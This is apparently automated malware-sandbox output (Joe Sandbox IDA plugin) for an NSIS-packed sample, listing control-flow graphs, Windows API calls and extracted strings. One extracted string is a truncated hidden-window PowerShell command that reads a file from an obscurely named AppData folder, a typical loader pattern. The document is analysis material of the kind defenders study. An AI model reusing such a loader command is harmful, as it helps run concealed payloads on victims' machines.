API calls 4825->4829 4827->4826 4828 4060e4 WriteFile 4827->4828 4828->4826 4829->4827 4830->4824 4831 401d38 4832 402d1c 17 API calls 4831->4832 4833 401d3f 4832->4833 4834 402d1c 17 API calls 4833->4834 4835 401d4b GetDlgItem 4834->4835 4836 402630 4835->4836 4837 4014b8 4838 4014be 4837->4838 4839 401389 2 API calls 4838->4839 4840 4014c6 4839->4840 4067 403fb9 4068 403fd1 4067->4068 4069 40410c 4067->4069 4068->4069 4070 403fdd 4068->4070 4071 40411d GetDlgItem GetDlgItem 4069->4071 4079 40415d 4069->4079 4072 403fe8 SetWindowPos 4070->4072 4073 403ffb 4070->4073 4074 404492 18 API calls 4071->4074 4072->4073 4076 404000 ShowWindow 4073->4076 4077 404018 4073->4077 4078 404147 SetClassLongW 4074->4078 4075 4044de SendMessageW 4108 4041c9 4075->4108 4076->4077 4083 404020 DestroyWindow 4077->4083 4084 40403a 4077->4084 4085 40140b 2 API calls 4078->4085 4080 4041b7 4079->4080 4081 401389 2 API calls 4079->4081 4080->4075 4082 404107 4080->4082 4086 40418f 4081->4086 4087 40441b 4083->4087 4088 404050 4084->4088 4089 40403f SetWindowLongW 4084->4089 4085->4079 4086->4080 4090 404193 SendMessageW 4086->4090 4087->4082 4098 40444c ShowWindow 4087->4098 4093 4040f9 4088->4093 4094 40405c GetDlgItem 4088->4094 4089->4082 4090->4082 4091 40140b 2 API calls 4091->4108 4092 40441d DestroyWindow KiUserCallbackDispatcher 4092->4087 4097 4044f9 8 API calls 4093->4097 4095 40408c 4094->4095 4096 40406f SendMessageW IsWindowEnabled 4094->4096 4100 404099 4095->4100 4101 4040e0 SendMessageW 4095->4101 4102 4040ac 4095->4102 4112 404091 4095->4112 4096->4082 4096->4095 4097->4082 4098->4082 4099 406579 17 API calls 4099->4108 4100->4101 4100->4112 4101->4093 4105 4040b4 4102->4105 4106 4040c9 4102->4106 4103 40446b SendMessageW 4107 4040c7 4103->4107 4104 404492 18 API calls 4104->4108 4110 40140b 2 API calls 4105->4110 4109 40140b 2 API calls 4106->4109 4107->4093 4108->4082 4108->4091 4108->4092 4108->4099 4108->4104 4113 404492 18 API calls 4108->4113 4129 40435d DestroyWindow 4108->4129 4111 4040d0 4109->4111 4110->4112 4111->4093 4111->4112 4112->4103 4114 404244 GetDlgItem 4113->4114 4115 404261 ShowWindow KiUserCallbackDispatcher 4114->4115 4116 404259 4114->4116 4138 4044b4 KiUserCallbackDispatcher 4115->4138 4116->4115 4118 40428b EnableWindow 4123 40429f 4118->4123 4119 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4120 4042d4 SendMessageW 4119->4120 4119->4123 4120->4123 4122 403f9a 18 API calls 4122->4123 4123->4119 4123->4122 4139 4044c7 SendMessageW 4123->4139 4140 40653c lstrcpynW 4123->4140 4125 404303 lstrlenW 4126 406579 17 API calls 4125->4126 4127 404319 SetWindowTextW 4126->4127 4128 401389 2 API calls 4127->4128 4128->4108 4129->4087 4130 404377 CreateDialogParamW 4129->4130 4130->4087 4131 4043aa 4130->4131 4132 404492 18 API calls 4131->4132 4133 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4132->4133 4134 401389 2 API calls 4133->4134 4135 4043fb 4134->4135 4135->4082 4136 404403 ShowWindow 4135->4136 4137 4044de SendMessageW 4136->4137 4137->4087 4138->4118 4139->4123 4140->4125 4841 4028bb 4842 4028c1 4841->4842 4843 402bc2 4842->4843 4844 4028c9 FindClose 4842->4844 4844->4843 4845 40493c 4846 404972 4845->4846 4847 40494c 4845->4847 4848 4044f9 8 API calls 4846->4848 4849 404492 18 API calls 4847->4849 4850 40497e 4848->4850 4851 404959 SetDlgItemTextW 4849->4851 4851->4846

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4035d8-403615 SetErrorMode GetVersion 1 403617-40361f call 406931 0->1 2 403628 0->2 1->2 8 403621 1->8 3 40362d-403641 call 4068c1 lstrlenA 2->3 9 403643-40365f call 406931 * 3 3->9 8->2 16 403670-4036cf #17 OleInitialize SHGetFileInfoW call 40653c GetCommandLineW call 40653c 9->16 17 403661-403667 9->17 24 4036d1-4036d8 16->24 25 4036d9-4036f3 call 405e3e CharNextW 16->25 17->16 22 403669 17->22 22->16 24->25 28 4036f9-4036ff 25->28 29 40380a-403824 GetTempPathW call 4035a7 25->29 31 403701-403706 28->31 32 403708-40370c 28->32 36 403826-403844 GetWindowsDirectoryW lstrcatW call 4035a7 29->36 37 40387c-403896 DeleteFileW call 403068 29->37 31->31 31->32 34 403713-403717 32->34 35 40370e-403712 32->35 38 4037d6-4037e3 call 405e3e 34->38 39 40371d-403723 34->39 35->34 36->37 54 403846-403876 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4035a7 36->54 57 403947-403957 ExitProcess CoUninitialize 37->57 58 40389c-4038a2 37->58 55 4037e5-4037e6 38->55 56 4037e7-4037ed 38->56 43 403725-40372d 39->43 44 40373e-403777 39->44 45 403734 43->45 46 40372f-403732 43->46 47 403794-4037ce 44->47 48 403779-40377e 44->48 45->44 46->44 46->45 47->38 53 4037d0-4037d4 47->53 48->47 52 403780-403788 48->52 61 40378a-40378d 52->61 62 40378f 52->62 53->38 63 4037f5-403803 call 40653c 53->63 54->37 54->57 55->56 56->28 65 4037f3 56->65 59 403a7d-403a83 57->59 60 40395d-40396d call 405ba2 ExitProcess 57->60 66 403937-40393e call 403c0b 58->66 67 4038a8-4038b3 call 405e3e 58->67 72 403b01-403b09 59->72 73 403a85-403a9b GetCurrentProcess OpenProcessToken 59->73 61->47 61->62 62->47 75 403808 63->75 65->75 77 403943 66->77 83 403901-40390b 67->83 84 4038b5-4038ea 67->84 78 403b0b 72->78 79 403b0f-403b13 ExitProcess 72->79 81 403ad1-403adf call 406931 73->81 82 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 73->82 75->29 77->57 78->79 94 403ae1-403aeb 81->94 95 403aed-403af8 ExitWindowsEx 81->95 82->81 87 403973-403987 call 405b0d lstrcatW 83->87 88 40390d-40391b call 405f19 83->88 86 4038ec-4038f0 84->86 90 4038f2-4038f7 86->90 91 4038f9-4038fd 86->91 102 403994-4039ae lstrcatW lstrcmpiW 87->102 103 403989-40398f lstrcatW 87->103 88->57 104 40391d-403933 call 40653c * 2 88->104 90->91 97 4038ff 90->97 91->86 91->97 94->95 96 403afa-403afc call 40140b 94->96 95->72 95->96 96->72 97->83 102->57 105 4039b0-4039b3 102->105 103->102 104->66 107 4039b5-4039ba call 405a73 105->107 108 4039bc call 405af0 105->108 113 4039c1-4039cf SetCurrentDirectoryW 107->113 108->113 116 4039d1-4039d7 call 40653c 113->116 117 4039dc-403a05 call 40653c 113->117 116->117 121 403a0a-403a26 call 406579 DeleteFileW 117->121 124 403a67-403a6f 121->124 125 403a28-403a38 CopyFileW 121->125 124->121 126 403a71-403a78 call 406302 124->126 125->124 127 403a3a-403a5a call 406302 call 406579 call 405b25 125->127 126->57 127->124 136 403a5c-403a63 CloseHandle 127->136 136->124
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 004035FB
                                                  • GetVersion.KERNEL32 ref: 00403601
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                                                  • OleInitialize.OLE32(00000000), ref: 00403678
                                                  • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                                                  • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\24100311.EXE.exe",00000020,"C:\Users\user\Desktop\24100311.EXE.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                                                    • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                    • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403838
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403854
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                                                  • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                                                    • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                  • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403947
                                                  • CoUninitialize.COMBASE(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                                                  • ExitProcess.KERNEL32 ref: 0040396D
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\24100311.EXE.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403980
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\24100311.EXE.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040398F
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\24100311.EXE.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040399A
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\24100311.EXE.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                                                  • DeleteFileW.KERNEL32(00420F08,00420F08,?,-windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\In,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                                                  • CopyFileW.KERNEL32(00438800,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                                                  • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                                                  • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                  • ExitProcess.KERNEL32 ref: 00403B13
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$-windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\In$.tmp$1033$C:\Users\user\AppData\Local\Decentraliseringers\misdidived$C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 424501083-1976314492
                                                  • Opcode ID: c35fdabfdad6bcc02558c5415dd16115c9247aea4d1f4ea4c566b72f04f2166e
                                                  • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                                                  • Opcode Fuzzy Hash: c35fdabfdad6bcc02558c5415dd16115c9247aea4d1f4ea4c566b72f04f2166e
                                                  • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 137 4056e3-4056fe 138 405704-4057cb GetDlgItem * 3 call 4044c7 call 404e20 GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 40588d-405894 137->139 157 4057e9-4057ec 138->157 158 4057cd-4057e7 SendMessageW * 2 138->158 141 405896-4058b8 GetDlgItem CreateThread CloseHandle 139->141 142 4058be-4058cb 139->142 141->142 143 4058e9-4058f3 142->143 144 4058cd-4058d3 142->144 148 4058f5-4058fb 143->148 149 405949-40594d 143->149 146 4058d5-4058e4 ShowWindow * 2 call 4044c7 144->146 147 40590e-405917 call 4044f9 144->147 146->143 161 40591c-405920 147->161 153 405923-405933 ShowWindow 148->153 154 4058fd-405909 call 40446b 148->154 149->147 151 40594f-405955 149->151 151->147 159 405957-40596a SendMessageW 151->159 162 405943-405944 call 40446b 153->162 163 405935-40593e call 4055a4 153->163 154->147 164 4057fc-405813 call 404492 157->164 165 4057ee-4057fa SendMessageW 157->165 158->157 166 405970-40599b CreatePopupMenu call 406579 AppendMenuW 159->166 167 405a6c-405a6e 159->167 162->149 163->162 176 405815-405829 ShowWindow 164->176 177 405849-40586a GetDlgItem SendMessageW 164->177 165->164 174 4059b0-4059c5 TrackPopupMenu 166->174 175 40599d-4059ad GetWindowRect 166->175 167->161 174->167 178 4059cb-4059e2 174->178 175->174 179 405838 176->179 180 40582b-405836 ShowWindow 176->180 177->167 181 405870-405888 SendMessageW * 2 177->181 182 4059e7-405a02 SendMessageW 178->182 183 40583e-405844 call 4044c7 179->183 180->183 181->167 182->182 184 405a04-405a27 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 405a29-405a50 SendMessageW 184->186 186->186 187 405a52-405a66 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->167
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405741
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405750
                                                  • GetClientRect.USER32(?,?), ref: 0040578D
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405794
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405830
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405851
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                                                    • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058B8
                                                  • ShowWindow.USER32(00000000), ref: 004058DC
                                                  • ShowWindow.USER32(?,00000008), ref: 004058E1
                                                  • ShowWindow.USER32(00000008), ref: 0040592B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                                                  • CreatePopupMenu.USER32 ref: 00405970
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                                                  • GetWindowRect.USER32(?,?), ref: 004059A4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                                                  • OpenClipboard.USER32(00000000), ref: 00405A05
                                                  • EmptyClipboard.USER32 ref: 00405A0B
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A21
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                                                  • CloseClipboard.USER32 ref: 00405A66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H7B${
                                                  • API String ID: 590372296-2256286769
                                                  • Opcode ID: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                                                  • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                                                  • Opcode Fuzzy Hash: c0017decbe78a65f06690748f72a161ce53dba5701f2afa5c1723caa79f33480
                                                  • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 406c5b-406c60 654 406cd1-406cef 653->654 655 406c62-406c91 653->655 658 4072c7-4072dc 654->658 656 406c93-406c96 655->656 657 406c98-406c9c 655->657 659 406ca8-406cab 656->659 660 406ca4 657->660 661 406c9e-406ca2 657->661 662 4072f6-40730c 658->662 663 4072de-4072f4 658->663 665 406cc9-406ccc 659->665 666 406cad-406cb6 659->666 660->659 661->659 664 40730f-407316 662->664 663->664 670 407318-40731c 664->670 671 40733d-407349 664->671 669 406e9e-406ebc 665->669 667 406cb8 666->667 668 406cbb-406cc7 666->668 667->668 677 406d31-406d5f 668->677 675 406ed4-406ee6 669->675 676 406ebe-406ed2 669->676 672 407322-40733a 670->672 673 4074cb-4074d5 670->673 678 406adf-406ae8 671->678 672->671 681 4074e1-4074f4 673->681 682 406ee9-406ef3 675->682 676->682 679 406d61-406d79 677->679 680 406d7b-406d95 677->680 687 4074f6 678->687 688 406aee 678->688 683 406d98-406da2 679->683 680->683 684 4074f9-4074fd 681->684 685 406ef5 682->685 686 406e96-406e9c 682->686 690 406da8 683->690 691 406d19-406d1f 683->691 703 406e7b-406e93 685->703 704 40747d-407487 685->704 686->669 689 406e3a-406e44 686->689 687->684 693 406af5-406af9 688->693 694 406c35-406c56 688->694 695 406b9a-406b9e 688->695 696 406c0a-406c0e 688->696 699 407489-407493 689->699 700 406e4a-407013 689->700 709 407465-40746f 690->709 710 406cfe-406d16 690->710 701 406dd2-406dd8 691->701 702 406d25-406d2b 691->702 693->681 708 406aff-406b0c 693->708 694->658 706 406ba4-406bbd 695->706 707 40744a-407454 695->707 697 406c14-406c28 696->697 698 407459-407463 696->698 711 406c2b-406c33 697->711 698->681 699->681 700->678 713 406e36 701->713 715 406dda-406df8 701->715 702->677 702->713 703->686 704->681 714 406bc0-406bc4 706->714 707->681 708->687 716 406b12-406b58 708->716 709->681 710->691 711->694 711->696 713->689 714->695 719 406bc6-406bcc 714->719 720 406e10-406e22 715->720 721 406dfa-406e0e 715->721 717 406b80-406b82 716->717 718 406b5a-406b5e 716->718 724 406b90-406b98 717->724 725 406b84-406b8e 717->725 722 406b60-406b63 GlobalFree 718->722 723 406b69-406b77 GlobalAlloc 718->723 726 406bf6-406c08 719->726 727 406bce-406bd5 719->727 728 406e25-406e2f 720->728 721->728 722->723 723->687 729 406b7d 723->729 724->714 725->724 725->725 726->711 730 406be0-406bf0 GlobalAlloc 727->730 731 406bd7-406bda GlobalFree 727->731 728->701 732 406e31 728->732 729->717 730->687 730->726 731->730 734 407471-40747b 732->734 735 406db7-406dcf 732->735 734->681 735->701
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                                  • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                                                  • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                                  • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing, xrefs: 00402261
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing
                                                  • API String ID: 542301482-208476317
                                                  • Opcode ID: b25282a8798a2ff3bd7ff6f31452890546f4edcfc94c4a7aadb2cb05dee97700
                                                  • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                                                  • Opcode Fuzzy Hash: b25282a8798a2ff3bd7ff6f31452890546f4edcfc94c4a7aadb2cb05dee97700
                                                  • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                                                  APIs
